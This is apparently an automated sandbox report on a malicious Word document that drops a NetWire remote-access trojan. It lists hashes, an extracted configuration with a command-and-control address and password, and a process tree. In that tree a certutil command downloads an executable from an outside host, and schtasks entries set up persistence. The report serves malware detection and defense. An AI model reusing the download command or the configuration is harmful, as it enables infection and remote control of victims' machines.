Analysis
-
max time kernel
98s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
30-09-2022 09:33
Behavioral task
behavioral1
Sample
RFQ 80479040.doc
Resource
win7-20220812-en
General
-
Target
RFQ 80479040.doc
-
Size
62KB
-
MD5
6328c4a16d653cb10c3b042301b2d6c3
-
SHA1
4dba059a50044581f2741868ce850618a042f0b5
-
SHA256
9e7f45fc3fe9b1849e1308f416aa57cf62588ca43359630649943b40fcf07856
-
SHA512
6d46cc27a4786b0072f1a53cdbd6e3c42e646b6f441ef39eee0630e37863c90bf8c8e40ee026af7cd98ac14474ff96b787ccab941f995fd7db80d0dcc4c2725f
-
SSDEEP
384:OkUgY5j96eYPKNiaI1WAE7OCb8iSUR/8dEv8krqrf4INzte/DZeIESy3uGjGWi2S:OP5I5I/q/qsfZ3qHGjG/owKSqXI
Malware Config
Extracted
netwire
37.0.14.206:3384
-
activex_autorun
false
-
copy_executable
true
-
delete_original
false
-
host_id
HostId-%Rand%
-
install_path
%AppData%\Install\Host.exe
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
true
-
offline_keylogger
true
-
password
Password234
-
registry_autorun
false
-
use_mutex
false
Signatures
-
NetWire RAT payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/3104-153-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/3104-156-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/3104-159-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/4004-167-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/4004-168-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/4004-169-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
certutil.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4340 2464 certutil.exe WINWORD.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
WinUpdate.exeWinUpdate.exeWinUpdate.exeHost.exeHost.exepid process 4976 WinUpdate.exe 3792 WinUpdate.exe 3104 WinUpdate.exe 4104 Host.exe 4004 Host.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WinUpdate.exeHost.exeWinUpdate.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WinUpdate.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Host.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WinUpdate.exe -
Drops file in System32 directory 2 IoCs
Processes:
svchost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{075E4A66-9B6A-4534-B80A-06A9B9DE6154}.catalogItem svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{794685C9-BE22-4FCE-9327-43BFF86DC3F5}.catalogItem svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
WinUpdate.exeHost.exedescription pid process target process PID 4976 set thread context of 3104 4976 WinUpdate.exe WinUpdate.exe PID 4104 set thread context of 4004 4104 Host.exe Host.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exeWINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4672 schtasks.exe 2556 schtasks.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
WINWORD.EXEsvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU svchost.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2464 WINWORD.EXE 2464 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
WinUpdate.exeHost.exepid process 4976 WinUpdate.exe 4976 WinUpdate.exe 4976 WinUpdate.exe 4104 Host.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
WinUpdate.exeHost.exedescription pid process Token: SeDebugPrivilege 4976 WinUpdate.exe Token: SeDebugPrivilege 4104 Host.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2464 WINWORD.EXE 2464 WINWORD.EXE 2464 WINWORD.EXE 2464 WINWORD.EXE 2464 WINWORD.EXE 2464 WINWORD.EXE 2464 WINWORD.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
WINWORD.EXEWinUpdate.exeWinUpdate.exeHost.exedescription pid process target process PID 2464 wrote to memory of 4340 2464 WINWORD.EXE certutil.exe PID 2464 wrote to memory of 4340 2464 WINWORD.EXE certutil.exe PID 2464 wrote to memory of 4976 2464 WINWORD.EXE WinUpdate.exe PID 2464 wrote to memory of 4976 2464 WINWORD.EXE WinUpdate.exe PID 2464 wrote to memory of 4976 2464 WINWORD.EXE WinUpdate.exe PID 4976 wrote to memory of 4672 4976 WinUpdate.exe schtasks.exe PID 4976 wrote to memory of 4672 4976 WinUpdate.exe schtasks.exe PID 4976 wrote to memory of 4672 4976 WinUpdate.exe schtasks.exe PID 4976 wrote to memory of 3792 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3792 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3792 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3104 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3104 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3104 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3104 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3104 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3104 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3104 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3104 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3104 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3104 4976 WinUpdate.exe WinUpdate.exe PID 4976 wrote to memory of 3104 4976 WinUpdate.exe WinUpdate.exe PID 3104 wrote to memory of 4104 3104 WinUpdate.exe Host.exe PID 3104 wrote to memory of 4104 3104 WinUpdate.exe Host.exe PID 3104 wrote to memory of 4104 3104 WinUpdate.exe Host.exe PID 4104 wrote to memory of 2556 4104 Host.exe schtasks.exe PID 4104 wrote to memory of 2556 4104 Host.exe schtasks.exe PID 4104 wrote to memory of 2556 4104 Host.exe schtasks.exe PID 4104 wrote to memory of 4004 4104 Host.exe Host.exe PID 4104 wrote to memory of 4004 4104 Host.exe Host.exe PID 4104 wrote to memory of 4004 4104 Host.exe Host.exe PID 4104 wrote to memory of 4004 4104 Host.exe Host.exe PID 4104 wrote to memory of 4004 4104 Host.exe Host.exe PID 4104 wrote to memory of 4004 4104 Host.exe Host.exe PID 4104 wrote to memory of 4004 4104 Host.exe Host.exe PID 4104 wrote to memory of 4004 4104 Host.exe Host.exe PID 4104 wrote to memory of 4004 4104 Host.exe Host.exe PID 4104 wrote to memory of 4004 4104 Host.exe Host.exe PID 4104 wrote to memory of 4004 4104 Host.exe Host.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ 80479040.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\System32\certutil.exe"C:\Windows\System32\certutil.exe" -urlcache -split -f https://teqturn.com/goblin/ea05f1fD14F2Jju.exe C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe2⤵
- Process spawned unexpected child process
PID:4340 -
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3A98.tmp"3⤵
- Creates scheduled task(s)
PID:4672 -
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"{path}"3⤵
- Executes dropped EXE
PID:3792 -
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"{path}"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Users\Admin\AppData\Roaming\Install\Host.exe"C:\Users\Admin\AppData\Roaming\Install\Host.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA604.tmp"5⤵
- Creates scheduled task(s)
PID:2556 -
C:\Users\Admin\AppData\Roaming\Install\Host.exe"{path}"5⤵
- Executes dropped EXE
PID:4004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
PID:2408
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
1KB
MD5e3110e1fc5bfa53e5636b145c05a9dd2
SHA1ccaaa930eae7676f078baaafef310a0e60e2b196
SHA2567bd775873865bef88fe486aba38d1e26483aa5d9475b8f51149458eda843ba3a
SHA512aa095af6006f03afd5003013b7e9be9e338811ee0ca1647d37d9ef203e826c7e67486f81861f70653eb6125d2f49be6878d7d705eeff8936d2fd2ca00450a314
-
Filesize
1KB
MD5e3110e1fc5bfa53e5636b145c05a9dd2
SHA1ccaaa930eae7676f078baaafef310a0e60e2b196
SHA2567bd775873865bef88fe486aba38d1e26483aa5d9475b8f51149458eda843ba3a
SHA512aa095af6006f03afd5003013b7e9be9e338811ee0ca1647d37d9ef203e826c7e67486f81861f70653eb6125d2f49be6878d7d705eeff8936d2fd2ca00450a314
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152